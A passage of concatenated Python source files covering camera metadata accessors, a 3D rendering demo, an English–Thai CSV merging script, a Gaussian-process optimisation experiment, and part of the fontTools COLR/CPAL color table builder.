return self.meta["image_data"][self.im_name]["principal_point"]
def focal_plane_resolution_px_per_mm(self) -> Tuple[float, float]:
return self.meta["focalplane_xres"], self.meta["focalplane_yres"]
def focal_length_mm(self) -> float:
return self.meta["image_data"][self.im_name]["focal_length_mm"]
def sfactor_35mm(self) -> float:
"""
extract the 35mm scale factor, sf[35], such that,
35 mm equivalent focal length = sf[35] * focal_length
"""
def __calc_backend(pxl_um: float, ncols: int, nrows: int) -> float:
"""
Backend calculation of the 35 mm scale factor
Parameters
----------
pxl_um : pixel size (micrometers, um) [float]
ncols : image width (or number of image columns) [int]
nrows : image height (or number of image rows) [int]
"""
pxl_mm = pxl_um / 1000.0 # pixel size in mm
diag_img = ((ncols * pxl_mm) ** 2 + (nrows * pxl_mm) ** 2) ** 0.5
diag_35mm = ((36.0) ** 2 + (24.0) ** 2) ** 0.5
return diag_35mm / diag_img
w, h = self.image_size()
pxl_size = 3.75 # micrometers
if self.camera_model() == "Altum":
if self.band_name().lower() == "lwir":
pxl_size = 12.0 # micrometers
else:
pxl_size = 3.45
return __calc_backend(pxl_size, w, h)
def focal_length_35_mm_eq(self) -> float:
# pyexiv2 cannot access the Composite keys including:
# Composite:FocalLength35efl
return self.meta["image_data"][self.im_name]["focal_length"] * self.sfactor_35mm()
def irradiance_scale_factor(self) -> float:
# return the conversion factor to get irradiance as SI units
return self.meta["image_data"][self.im_name]["irradiance_scale_factor"]
def horizontal_irradiance_valid(self) -> bool:
return self.meta["image_data"][self.im_name]["horizontal_irradiance_valid"]
def spectral_irradiance(self) -> float:
"""
LEGACY FUNCTION
Raw spectral irradiance measured by an irradiance sensor.
Calibrated to W/m^2/nm using irradiance_scale_factor, but
not corrected for angles
"""
return (
self.meta["image_data"][self.im_name]["dls_Ed"]
* self.irradiance_scale_factor()
)
def horizontal_irradiance(self) -> float:
"""
Horizontal irradiance at the earth's surface below the DLS on the
plane normal to the gravity vector at the location (local flat
plane spectral irradiance)
"""
return (
self.meta["image_data"][self.im_name]["dls_Ed_h"]
* self.irradiance_scale_factor()
)
def scattered_irradiance(self) -> float:
"""scattered component of the spectral irradiance"""
return (
self.meta["image_data"][self.im_name]["dls_Ed_s"]
* self.irradiance_scale_factor()
)
def direct_irradiance(self) -> float:
"""
direct component of the spectral irradiance on a ploane normal
to the vector towards the sun
"""
return (
self.meta["image_data"][self.im_name]["dls_Ed_d"]
* self.irradiance_scale_factor()
)
def solar_azimuth(self) -> float:
"""solar azimuth at the time of capture, as calculated by the camera system"""
return self.meta["dls_solarazi"]
def solar_elevation(self) -> float:
"""solar elevation at the time of capture, as calculated by the camera system"""
return self.meta["dls_solarzen"]
def estimated_direct_vector(self) -> Union[List[float], None]:
"""estimated direct light vector relative to the DLS2 reference frame"""
return self.meta["image_data"][self.im_name]["dls_EstimatedDirectLightVector"]
def auto_calibration_image(self) -> bool:
return self.meta["image_data"][self.im_name]["auto_calibration_image"]
def panel_albedo(self) -> Union[float, None]:
return self.meta["image_data"][self.im_name]["panel_albedo"]
def panel_region(self) -> Union[None, List[int]]:
return self.meta["image_data"][self.im_name]["panel_region"]
def panel_serial(self) -> Union[str, None]:
return self.meta["image_data"][self.im_name]["panel_serial"]
|
<reponame>skunkwile/UW-Graphics<gh_stars>1-10
import display
from engine import *
from math import pi
import numpy as np
size = width, height = (1280 // 2, 960 // 2)
scene = Scene()
# mesh = Mesh([
# Vec3(-10, 0, 0),
# Vec3(0, 0, -5),
# Vec3(3, 0, 7),
# Vec3(4, 0, 1),
# ], [(0, 1, 2)])
# mesh = Mesh([
# Vec3(1, 0, 1), # TOP RIGHT
# Vec3(-1, 0, 1), # TOP LEFT
# Vec3(-1, 0, -1), # BOTTOM LEFT
# Vec3(1, 0, -1), # BOTTOM RIGHT
# ], [(0, 1, 2), (2, 3, 0)])
mesh = Mesh(np.asarray([
(1, 1, 1),
(-1, 1, 1),
(1, 1, -1),
(-1, 1, -1),
(1, -1, 1),
(-1, -1, 1),
(1, -1, -1),
(-1, -1, -1),
]), np.asarray([
(0, 2, 3), (0, 3, 1),
(1, 3, 5), (3, 7, 5),
(2, 7, 3), (2, 6, 7),
(4, 7, 6), (4, 5, 7),
(0, 4, 2), (2, 4, 6),
(0, 5, 1), (0, 4, 5)
]))
# mesh = Mesh(np.asarray([
# (0, 1, 0),
# (-1, -1, 0),
# (1, -1, 0)
# ]), np.asarray([
# (0, 1, 2)
# ]))
# node = Node(mesh, Transform.of(translation=np.asarray([0, 0, -10]), scaling=np.asarray([50, 50, 50])))
node_rotation = np.asarray([0, 0, pi / 4])
node_scale = np.asarray([1, 1, 1]) * 2
node = Node(mesh, Transform.of(np.asarray([-1, -4, 57]), node_rotation, node_scale))
scene.root.add_child(node)
camera = Camera(4, 4, 3, 1, 100)
scene.root.add_child(camera)
scene.active_camera = camera
should_draw = True
def main_loop(screen):
global should_draw
if should_draw:
screen.draw(scene.render(screen))
should_draw = False
def key_handler(key):
global should_draw
# print("KEY: "+key)
if key == 'a':
node.transform.translation[0] -= 1
elif key == 'd':
node.transform.translation[0] += 1
elif key == 'w':
node.transform.translation[1] += 1
elif key == 's':
node.transform.translation[1] -= 1
elif key == 'q':
node.transform.translation[2] -= 1
elif key == 'e':
node.transform.translation[2] += 1
if key == 'f':
node_rotation[2] -= pi / 16
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'h':
node_rotation[2] += pi / 16
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 't':
node_rotation[0] -= pi / 16
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'g':
node_rotation[0] += pi / 16
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'r':
node_rotation[1] -= pi / 16
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'y':
node_rotation[1] += pi / 16
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
if key == 'u':
node_scale[0] += 0.25
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'j':
node_scale[0] -= 0.25
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'i':
node_scale[1] += 0.25
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'k':
node_scale[1] -= 0.25
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'o':
node_scale[2] += 0.25
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'l':
node_scale[2] -= 0.25
node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
elif key == 'z':
camera.focal_length *= 0.5
# print(camera.focal_length)
elif key == 'x':
camera.focal_length *= 2
# print(camera.focal_length)
should_draw = True
# screen.draw(scene.render(screen))
# print(node.transform)
display.Screen(*size, title="UW Graphics", frame_rate=60, update=main_loop, callback=key_handler)
# while True:
# time.sleep(0.5)
# print("PING") |
<filename>scripts/merge_csv_files.py
import argparse
import os
import glob
import time
import csv
from pathlib import Path
from collections import Counter
from tqdm.auto import tqdm
import pandas as pd
def main(csv_directory, out_directory):
csv_files = glob.glob(os.path.join(csv_directory, '*.csv'))
df_list = {}
sent_pairs_counter = Counter()
for filepath in csv_files:
filename = Path(filepath).stem
df_list[filename] = pd.read_csv(filepath)
sent_pairs_counter[filename] = df_list[filename].shape[0]
print('\nDataset Statisitcs:\n')
print('-' * 30)
print('')
for k, v in sent_pairs_counter.most_common(len(sent_pairs_counter)):
print(f'Sub-dataset: {k:30}, # Sentence pairs: {v:10,}')
print('')
print(f'\nTotal: {sum(sent_pairs_counter.values()):10,}')
write_to_txt(out_directory, df_list)
def write_to_txt(out_directory, df_list):
if not os.path.exists(out_directory):
print(f'\nCreate a directory at: `{out_directory}`')
os.makedirs(out_directory, exist_ok=True)
out_path = os.path.join(out_directory, 'en-th.merged.csv')
print(f'\n\nBegin writing file in txt format to: `{out_path}`.\n')
merged_item_ids = []
for dataset_name, df in df_list.items():
for index, _ in df.iterrows():
sentence_id = f'{index}:{dataset_name}'
merged_item_ids.append(sentence_id)
merged_en_texts = pd.concat([df.en_text for _, df in df_list.items()]).apply(
lambda x: str(x).strip())
merged_th_texts = pd.concat([df.th_text for _, df in df_list.items()]).apply(
lambda x: str(x).strip())
merged_en_texts_is_duplicated = merged_en_texts.duplicated(
keep=False).tolist()
merged_th_texts_is_duplicated = merged_th_texts.duplicated(
keep=False).tolist()
with open(out_path, 'w', encoding='utf-8') as f:
writer = csv.writer(f, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
writer.writerow(['sentence_id', 'en', 'th',
'is_en_uniq', 'is_th_uniq'])
for index, sentence_id in tqdm(enumerate(merged_item_ids), total=len(merged_item_ids)):
is_en_uniq = not merged_en_texts_is_duplicated[index]
is_th_uniq = not merged_th_texts_is_duplicated[index]
en, th = merged_en_texts.iloc[index].replace(
'\n', ''), merged_th_texts.iloc[index].replace('\n', '')
writer.writerow([sentence_id, en, th, is_en_uniq, is_th_uniq])
print('\nDone merging csv files into a txt file.')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'csv_dir', help='Directory that stored the dataset in .csv format')
parser.add_argument('--out_dir', help='Directory that stored merged dataset in .txt format',
default='./dataset/merged')
args = parser.parse_args()
csv_directory = args.csv_dir
out_directory = args.out_dir
main(csv_directory, out_directory)
|
import numpy as np
import matplotlib.pyplot as plt
import gpflow
def dbtime(X):
x1 = X[:,0]
x2 = X[:,1]
return (x1/2-2)*(x1/2-2)+2 + 2*np.sin(x2)+2*np.sin(x2*2)+5+np.sin(x2/2)+2*np.sin(x2)+2*np.sin(x2*2)+5+np.sin(x2/2)
class Optimize():
def __init__(self, func, start_point, nb_param ):
self.func = func
self.nb_param= nb_param
self.start_point = start_point
self.X = np.random.rand(start_point,1)*10
print("Random first parameter:")
print(self.X)
for i in range(self.nb_param-1):
print("Random next parameter:")
xp = np.random.rand(start_point,1)*10
self.X = np.concatenate( (self.X, xp), axis=1 )
self.Y = self.func(self.X)
self.Y = self.Y.reshape(len(self.Y), 1)
self.run = 0
self.plt = plt
def buildModelGaussien(self):
'''
Réalise la régression gaussienne avec GPFlow
'''
# Definition du kernel
k1 = gpflow.kernels.Matern52(1, active_dims=[0], lengthscales=0.3)
k1.lengthscales.trainable = False
k1.lengthscales = 1.0
k2 = gpflow.kernels.Matern52(1, active_dims=[1], lengthscales=0.3)
k2.lengthscales.trainable = False
k2.lengthscales = 1.0
self.k = k1 + k2
# Definition du model
self.m = gpflow.models.GPR(self.X, self.Y, kern=self.k)
# Ajustement du lengthscales
# Compilation du model
self.m.compile()
# Optimisation
gpflow.train.ScipyOptimizer().minimize(self.m)
def getNextPoint(self):
'''
Determine le prochain point à explorer
Se base sur une focntion d'acquisition: fct = -mean+var
'''
# On construit un vecteur de 100 point entre 0 et 10 qui est notre abscisse graphique
xx = None
for xx1 in range(0,100):
for xx2 in range(0,100):
if xx is None:
xx = np.array([[xx1,xx2]])
else:
xx = np.concatenate((xx, [[xx1,xx2]]))
xx = xx / 10
# On réalise toutes les prédictions sur depuis ce vecteur pour obtenir mean et var
# mean et var sont aussi des vecteurs
mean, var = self.m.predict_y(xx)
#print("variance %s:" % (var))
# Vecteur resultat de la fonction d'acquisition
# acqu est un matric: une colonne par paramètre
acqu = (-mean+var)
# Dans cette exemple il n'y a qu'un paramètre, on met a plat la matrice
acquflatten = acqu.flatten()
# On cherche la plus grande valeur
maxvalue = max(acquflatten)
#print("Max found: %s " % maxvalue)
# On trouve le paramètre assicié
whereisit = np.where(acquflatten ==maxvalue )[0][0]
# Le prochain points d'asbcisse est donc:
next_abs = xx[whereisit]
# On enrichie X et Y
self.X = np.concatenate( (self.X, [next_abs]))
result = self.func(next_abs.reshape((1,2)))
#print("After search %s: " % result)
self.Y = np.concatenate( (self.Y, result.reshape((1,1)) ) )
self.run += 1
return next_abs
def plot_mg(self):
xx = np.linspace(0, 10, 100)[:,None]
mean, var = self.m.predict_y(xx)
self.plt.plot(self.X, self.Y, 'kx', mew=2)
self.plt.plot(xx, mean, 'b', lw=2)
self.plt.fill_between(xx[:,0], mean[:,0] - 2*np.sqrt(var[:,0]), mean[:,0] + 2*np.sqrt(var[:,0]), color='blue', alpha=0.2)
def plot_acq(self):
xx = np.linspace(0, 10, 100)[:,None]
mean, var = self.m.predict_y(xx)
self.plt.plot(xx, (-mean+var)/5-4, color='green')
def print(self):
print("Content of X:")
print(self.X)
print("Content of Y:")
print(self.Y)
def savefig(self):
self.plt.figure(self.run)
self.plt.grid()
self.plt.xlim(0,10)
self.plt.ylim(-6,10)
self.plt.title("Run %s après un depart aléatoire de %s points" % (self.run, self.start_point))
self.plot_dbtime()
self.plot_mg()
self.plot_acq()
self.plt.savefig('result6a_%s.png' % (self.run))
def plot_dbtime(self):
xfct = np.arange(0,np.pi*4,0.1)
yfct = self.func(xfct)
self.plt.plot(xfct,yfct, color='red')
print ('Starting...')
opt = Optimize( dbtime, 10, 2 )
opt.print()
opt.buildModelGaussien()
next_abs = opt.getNextPoint()
print ('Searching for min...')
for i in range(20):
next_abs = opt.getNextPoint()
print("Next point to explore: %s and dbtime(x)=%s" % (next_abs,dbtime(next_abs.reshape((1,2)))))
opt.buildModelGaussien()
|
"""
colorLib.builder: Build COLR/CPAL tables from scratch
"""
import collections
import copy
import enum
from functools import partial
from typing import (
Any,
Dict,
Generator,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Type,
TypeVar,
Union,
)
from fontTools.misc.fixedTools import fixedToFloat
from fontTools.ttLib.tables import C_O_L_R_
from fontTools.ttLib.tables import C_P_A_L_
from fontTools.ttLib.tables import _n_a_m_e
from fontTools.ttLib.tables.otBase import BaseTable
from fontTools.ttLib.tables import otTables as ot
from fontTools.ttLib.tables.otTables import (
ExtendMode,
CompositeMode,
VariableValue,
VariableFloat,
VariableInt,
)
from .errors import ColorLibError
# TODO move type aliases to colorLib.types?
T = TypeVar("T")
_Kwargs = Mapping[str, Any]
_PaintInput = Union[int, _Kwargs, ot.Paint, Tuple[str, "_PaintInput"]]
_PaintInputList = Sequence[_PaintInput]
_ColorGlyphsDict = Dict[str, Union[_PaintInputList, _PaintInput]]
_ColorGlyphsV0Dict = Dict[str, Sequence[Tuple[str, int]]]
_Number = Union[int, float]
_ScalarInput = Union[_Number, VariableValue, Tuple[_Number, int]]
_ColorStopTuple = Tuple[_ScalarInput, int]
_ColorStopInput = Union[_ColorStopTuple, _Kwargs, ot.ColorStop]
_ColorStopsList = Sequence[_ColorStopInput]
_ExtendInput = Union[int, str, ExtendMode]
_CompositeInput = Union[int, str, CompositeMode]
_ColorLineInput = Union[_Kwargs, ot.ColorLine]
_PointTuple = Tuple[_ScalarInput, _ScalarInput]
_AffineTuple = Tuple[
_ScalarInput, _ScalarInput, _ScalarInput, _ScalarInput, _ScalarInput, _ScalarInput
]
_AffineInput = Union[_AffineTuple, ot.Affine2x3]
MAX_PAINT_COLR_LAYER_COUNT = 255
def populateCOLRv0(
table: ot.COLR,
colorGlyphsV0: _ColorGlyphsV0Dict,
glyphMap: Optional[Mapping[str, int]] = None,
):
"""Build v0 color layers and add to existing COLR table.
Args:
table: a raw otTables.COLR() object (not ttLib's table_C_O_L_R_).
colorGlyphsV0: map of base glyph names to lists of (layer glyph names,
color palette index) tuples.
glyphMap: a map from glyph names to glyph indices, as returned from
TTFont.getReverseGlyphMap(), to optionally sort base records by GID.
"""
if glyphMap is not None:
colorGlyphItems = sorted(
colorGlyphsV0.items(), key=lambda item: glyphMap[item[0]]
)
else:
colorGlyphItems = colorGlyphsV0.items()
baseGlyphRecords = []
layerRecords = []
for baseGlyph, layers in colorGlyphItems:
baseRec = ot.BaseGlyphRecord()
baseRec.BaseGlyph = baseGlyph
baseRec.FirstLayerIndex = len(layerRecords)
baseRec.NumLayers = len(layers)
baseGlyphRecords.append(baseRec)
for layerGlyph, paletteIndex in layers:
layerRec = ot.LayerRecord()
layerRec.LayerGlyph = layerGlyph
layerRec.PaletteIndex = paletteIndex
layerRecords.append(layerRec)
table.BaseGlyphRecordCount = len(baseGlyphRecords)
table.BaseGlyphRecordArray = ot.BaseGlyphRecordArray()
table.BaseGlyphRecordArray.BaseGlyphRecord = baseGlyphRecords
table.LayerRecordArray = ot.LayerRecordArray()
table.LayerRecordArray.LayerRecord = layerRecords
table.LayerRecordCount = len(layerRecords)
def buildCOLR(
colorGlyphs: _ColorGlyphsDict,
version: Optional[int] = None,
glyphMap: Optional[Mapping[str, int]] = None,
varStore: Optional[ot.VarStore] = None,
) -> C_O_L_R_.table_C_O_L_R_:
"""Build COLR table from color layers mapping.
Args:
colorGlyphs: map of base glyph name to, either list of (layer glyph name,
color palette index) tuples for COLRv0; or a single Paint (dict) or
list of Paint for COLRv1.
version: the version of COLR table. If None, the version is determined
by the presence of COLRv1 paints or variation data (varStore), which
require version 1; otherwise, if all base glyphs use only simple color
layers, version 0 is used.
glyphMap: a map from glyph names to glyph indices, as returned from
TTFont.getReverseGlyphMap(), to optionally sort base records by GID.
varStore: Optional ItemVarationStore for deltas associated with v1 layer.
Return:
A new COLR table.
"""
self = C_O_L_R_.table_C_O_L_R_()
if varStore is not None and version == 0:
raise ValueError("Can't add VarStore to COLRv0")
if version in (None, 0) and not varStore:
# split color glyphs into v0 and v1 and encode separately
colorGlyphsV0, colorGlyphsV1 = _split_color_glyphs_by_version(colorGlyphs)
if version == 0 and colorGlyphsV1:
raise ValueError("Can't encode COLRv1 glyphs in COLRv0")
else:
# unless explicitly requested for v1 or have variations, in which case
# we encode all color glyph as v1
colorGlyphsV0, colorGlyphsV1 = None, colorGlyphs
colr = ot.COLR()
if colorGlyphsV0:
populateCOLRv0(colr, colorGlyphsV0, glyphMap)
else:
colr.BaseGlyphRecordCount = colr.LayerRecordCount = 0
colr.BaseGlyphRecordArray = colr.LayerRecordArray = None
if colorGlyphsV1:
colr.LayerV1List, colr.BaseGlyphV1List = buildColrV1(colorGlyphsV1, glyphMap)
if version is None:
version = 1 if (varStore or colorGlyphsV1) else 0
elif version not in (0, 1):
raise NotImplementedError(version)
self.version = colr.Version = version
if version == 0:
self._fromOTTable(colr)
else:
colr.VarStore = varStore
self.table = colr
return self
class ColorPaletteType(enum.IntFlag):
USABLE_WITH_LIGHT_BACKGROUND = 0x0001
USABLE_WITH_DARK_BACKGROUND = 0x0002
@classmethod
def _missing_(cls, value):
# enforce reserved bits
if isinstance(value, int) and (value < 0 or value & 0xFFFC != 0):
raise ValueError(f"{value} is not a valid {cls.__name__}")
return super()._missing_(value)
# None, 'abc' or {'en': 'abc', 'de': 'xyz'}
_OptionalLocalizedString = Union[None, str, Dict[str, str]]
def buildPaletteLabels(
labels: Iterable[_OptionalLocalizedString], nameTable: _n_a_m_e.table__n_a_m_e
) -> List[Optional[int]]:
return [
nameTable.addMultilingualName(l, mac=False)
if isinstance(l, dict)
else C_P_A_L_.table_C_P_A_L_.NO_NAME_ID
if l is None
else nameTable.addMultilingualName({"en": l}, mac=False)
for l in labels
]
def buildCPAL(
palettes: Sequence[Sequence[Tuple[float, float, float, float]]],
paletteTypes: Optional[Sequence[ColorPaletteType]] = None,
paletteLabels: Optional[Sequence[_OptionalLocalizedString]] = None,
paletteEntryLabels: Optional[Sequence[_OptionalLocalizedString]] = None,
nameTable: Optional[_n_a_m_e.table__n_a_m_e] = None,
) -> C_P_A_L_.table_C_P_A_L_:
"""Build CPAL table from list of color palettes.
Args:
palettes: list of lists of colors encoded as tuples of (R, G, B, A) floats
in the range [0..1].
paletteTypes: optional list of ColorPaletteType, one for each palette.
paletteLabels: optional list of palette labels. Each lable can be either:
None (no label), a string (for for default English labels), or a
localized string (as a dict keyed with BCP47 language codes).
paletteEntryLabels: optional list of palette entry labels, one for each
palette entry (see paletteLabels).
nameTable: optional name table where to store palette and palette entry
labels. Required if either paletteLabels or paletteEntryLabels is set.
Return:
A new CPAL v0 or v1 table, if custom palette types or labels are specified.
"""
if len({len(p) for p in palettes}) != 1:
raise ColorLibError("color palettes have different lengths")
if (paletteLabels or paletteEntryLabels) and not nameTable:
raise TypeError(
"nameTable is required if palette or palette entries have labels"
)
cpal = C_P_A_L_.table_C_P_A_L_()
cpal.numPaletteEntries = len(palettes[0])
cpal.palettes = []
for i, palette in enumerate(palettes):
colors = []
for j, color in enumerate(palette):
if not isinstance(color, tuple) or len(color) != 4:
raise ColorLibError(
f"In palette[{i}][{j}]: expected (R, G, B, A) tuple, got {color!r}"
)
if any(v > 1 or v < 0 for v in color):
raise ColorLibError(
f"palette[{i}][{j}] has invalid out-of-range [0..1] color: {color!r}"
)
# input colors are RGBA, CPAL encodes them as BGRA
red, green, blue, alpha = color
colors.append(
C_P_A_L_.Color(*(round(v * 255) for v in (blue, green, red, alpha)))
)
cpal.palettes.append(colors)
if any(v is not None for v in (paletteTypes, paletteLabels, paletteEntryLabels)):
cpal.version = 1
if paletteTypes is not None:
if len(paletteTypes) != len(palettes):
raise ColorLibError(
f"Expected {len(palettes)} paletteTypes, got {len(paletteTypes)}"
)
cpal.paletteTypes = [ColorPaletteType(t).value for t in paletteTypes]
else:
cpal.paletteTypes = [C_P_A_L_.table_C_P_A_L_.DEFAULT_PALETTE_TYPE] * len(
palettes
)
if paletteLabels is not None:
if len(paletteLabels) != len(palettes):
raise ColorLibError(
f"Expected {len(palettes)} paletteLabels, got {len(paletteLabels)}"
)
cpal.paletteLabels = buildPaletteLabels(paletteLabels, nameTable)
else:
cpal.paletteLabels = [C_P_A_L_.table_C_P_A_L_.NO_NAME_ID] * len(palettes)
if paletteEntryLabels is not None:
if len(paletteEntryLabels) != cpal.numPaletteEntries:
raise ColorLibError(
f"Expected {cpal.numPaletteEntries} paletteEntryLabels, "
f"got {len(paletteEntryLabels)}"
)
cpal.paletteEntryLabels = buildPaletteLabels(paletteEntryLabels, nameTable)
else:
cpal.paletteEntryLabels = [
C_P_A_L_.table_C_P_A_L_.NO_NAME_ID
] * cpal.numPaletteEntries
else:
cpal.version = 0
return cpal
# COLR v1 tables
# See draft proposal at: https://github.com/googlefonts/colr-gradients-spec
_DEFAULT_ALPHA = VariableFloat(1.0)
def _is_colrv0_layer(layer: Any) -> bool:
# Consider as COLRv0 layer any sequence of length 2 (be it tuple or list) in which
# the first element is a str (the layerGlyph) and the second element is an int
# (CPAL paletteIndex).
# https://github.com/googlefonts/ufo2ft/issues/426
try:
layerGlyph, paletteIndex = layer
except (TypeError, ValueError):
return False
else:
return isinstance(layerGlyph, str) and isinstance(paletteIndex, int)
def _split_color_glyphs_by_version(
colorGlyphs: _ColorGlyphsDict,
) -> Tuple[_ColorGlyphsV0Dict, _ColorGlyphsDict]:
colorGlyphsV0 = {}
colorGlyphsV1 = {}
for baseGlyph, layers in colorGlyphs.items():
if all(_is_colrv0_layer(l) for l in layers):
colorGlyphsV0[baseGlyph] = layers
else:
colorGlyphsV1[baseGlyph] = layers
# sanity check
assert set(colorGlyphs) == (set(colorGlyphsV0) | set(colorGlyphsV1))
return colorGlyphsV0, colorGlyphsV1
def _to_variable_value(
value: _ScalarInput,
minValue: _Number,
maxValue: _Number,
cls: Type[VariableValue],
) -> VariableValue:
if not isinstance(value, cls):
try:
it = iter(value)
except TypeError: # not iterable
value = cls(value)
else:
value = cls._make(it)
if value.value < minValue:
raise OverflowError(f"{cls.__name__}: {value.value} < {minValue}")
if value.value > maxValue:
raise OverflowError(f"{cls.__name__}: {value.value} < {maxValue}")
return value
_to_variable_f16dot16_float = partial(
_to_variable_value,
cls=VariableFloat,
minValue=-(2 ** 15),
maxValue=fixedToFloat(2 ** 31 - 1, 16),
)
_to_variable_f2dot14_float = partial(
_to_variable_value,
cls=VariableFloat,
minValue=-2.0,
maxValue=fixedToFloat(2 ** 15 - 1, 14),
)
_to_variable_int16 = partial(
_to_variable_value,
cls=VariableInt,
minValue=-(2 ** 15),
maxValue=2 ** 15 - 1,
)
_to_variable_uint16 = partial(
_to_variable_value,
cls=VariableInt,
minValue=0,
maxValue=2 ** 16,
)
def buildColorIndex(
paletteIndex: int, alpha: _ScalarInput = _DEFAULT_ALPHA
) -> ot.ColorIndex:
self = ot.ColorIndex()
self.PaletteIndex = int(paletteIndex)
self.Alpha = _to_variable_f2dot14_float(alpha)
return self
def buildColorStop(
offset: _ScalarInput,
paletteIndex: int,
alpha: _ScalarInput = _DEFAULT_ALPHA,
) -> ot.ColorStop:
self = ot.ColorStop()
self.StopOffset = _to_variable_f2dot14_float(offset)
self.Color = buildColorIndex(paletteIndex, alpha)
return self
def _to_enum_value(v: Union[str, int, T], enumClass: Type[T]) -> T:
if isinstance(v, enumClass):
return v
elif isinstance(v, str):
try:
return getattr(enumClass, v.upper())
except AttributeError:
raise ValueError(f"{v!r} is not a valid {enumClass.__name__}")
return enumClass(v)
def _to_extend_mode(v: _ExtendInput) -> ExtendMode:
return _to_enum_value(v, ExtendMode)
def _to_composite_mode(v: _CompositeInput) -> CompositeMode:
return _to_enum_value(v, CompositeMode)
def buildColorLine(
stops: _ColorStopsList, extend: _ExtendInput = ExtendMode.PAD
) -> ot.ColorLine:
self = ot.ColorLine()
self.Extend = _to_extend_mode(extend)
self.StopCount = len(stops)
self.ColorStop = [
stop
if isinstance(stop, ot.ColorStop)
else buildColorStop(**stop)
if isinstance(stop, collections.abc.Mapping)
else buildColorStop(*stop)
for stop in stops
]
return self
def _to_color_line(obj):
if isinstance(obj, ot.ColorLine):
return obj
elif isinstance(obj, collections.abc.Mapping):
return buildColorLine(**obj)
raise TypeError(obj)
def _as_tuple(obj) -> Tuple[Any, ...]:
# start simple, who even cares about cyclic graphs or interesting field types
def _tuple_safe(value):
if isinstance(value, enum.Enum):
return value
elif hasattr(value, "__dict__"):
return tuple((k, _tuple_safe(v)) for k, v in value.__dict__.items())
elif isinstance(value, collections.abc.MutableSequence):
return tuple(_tuple_safe(e) for e in value)
return value
return tuple(_tuple_safe(obj))
def _reuse_ranges(num_layers: int) -> Generator[Tuple[int, int], None, None]:
# TODO feels like something itertools might have already
for lbound in range(num_layers):
# TODO may want a max length to limit scope of search
# Reuse of very large #s of layers is relatively unlikely
# +2: we want sequences of at least 2
# otData handles single-record duplication
for ubound in range(lbound + 2, num_layers + 1):
yield (lbound, ubound)
class LayerV1ListBuilder:
slices: List[ot.Paint]
layers: List[ot.Paint]
reusePool: Mapping[Tuple[Any, ...], int]
def __init__(self):
self.slices = []
self.layers = []
self.reusePool = {}
def buildPaintSolid(
self, paletteIndex: int, alpha: _ScalarInput = _DEFAULT_ALPHA
) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintSolid)
ot_paint.Color = buildColorIndex(paletteIndex, alpha)
return ot_paint
def buildPaintLinearGradient(
self,
colorLine: _ColorLineInput,
p0: _PointTuple,
p1: _PointTuple,
p2: Optional[_PointTuple] = None,
) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintLinearGradient)
ot_paint.ColorLine = _to_color_line(colorLine)
if p2 is None:
p2 = copy.copy(p1)
for i, (x, y) in enumerate((p0, p1, p2)):
setattr(ot_paint, f"x{i}", _to_variable_int16(x))
setattr(ot_paint, f"y{i}", _to_variable_int16(y))
return ot_paint
def buildPaintRadialGradient(
self,
colorLine: _ColorLineInput,
c0: _PointTuple,
c1: _PointTuple,
r0: _ScalarInput,
r1: _ScalarInput,
) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintRadialGradient)
ot_paint.ColorLine = _to_color_line(colorLine)
for i, (x, y), r in [(0, c0, r0), (1, c1, r1)]:
setattr(ot_paint, f"x{i}", _to_variable_int16(x))
setattr(ot_paint, f"y{i}", _to_variable_int16(y))
setattr(ot_paint, f"r{i}", _to_variable_uint16(r))
return ot_paint
def buildPaintGlyph(self, glyph: str, paint: _PaintInput) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintGlyph)
ot_paint.Glyph = glyph
ot_paint.Paint = self.buildPaint(paint)
return ot_paint
def buildPaintColrGlyph(self, glyph: str) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintColrGlyph)
ot_paint.Glyph = glyph
return ot_paint
def buildPaintTransform(
self, transform: _AffineInput, paint: _PaintInput
) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintTransform)
if not isinstance(transform, ot.Affine2x3):
transform = buildAffine2x3(transform)
ot_paint.Transform = transform
ot_paint.Paint = self.buildPaint(paint)
return ot_paint
def buildPaintComposite(
self,
mode: _CompositeInput,
source: _PaintInput,
backdrop: _PaintInput,
):
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintComposite)
ot_paint.SourcePaint = self.buildPaint(source)
ot_paint.CompositeMode = _to_composite_mode(mode)
ot_paint.BackdropPaint = self.buildPaint(backdrop)
return ot_paint
def buildColrLayers(self, paints: List[_PaintInput]) -> ot.Paint:
ot_paint = ot.Paint()
ot_paint.Format = int(ot.Paint.Format.PaintColrLayers)
self.slices.append(ot_paint)
paints = [self.buildPaint(p) for p in paints]
# Look for reuse, with preference to longer sequences
found_reuse = True
while found_reuse:
found_reuse = False
ranges = sorted(
_reuse_ranges(len(paints)),
key=lambda t: (t[1] - t[0], t[1], t[0]),
reverse=True,
)
for lbound, ubound in ranges:
reuse_lbound = self.reusePool.get(_as_tuple(paints[lbound:ubound]), -1)
if reuse_lbound == -1:
continue
new_slice = ot.Paint()
new_slice.Format = int(ot.Paint.Format.PaintColrLayers)
new_slice.NumLayers = ubound - lbound
new_slice.FirstLayerIndex = reuse_lbound
paints = paints[:lbound] + [new_slice] + paints[ubound:]
found_reuse = True
break
ot_paint.NumLayers = len(paints)
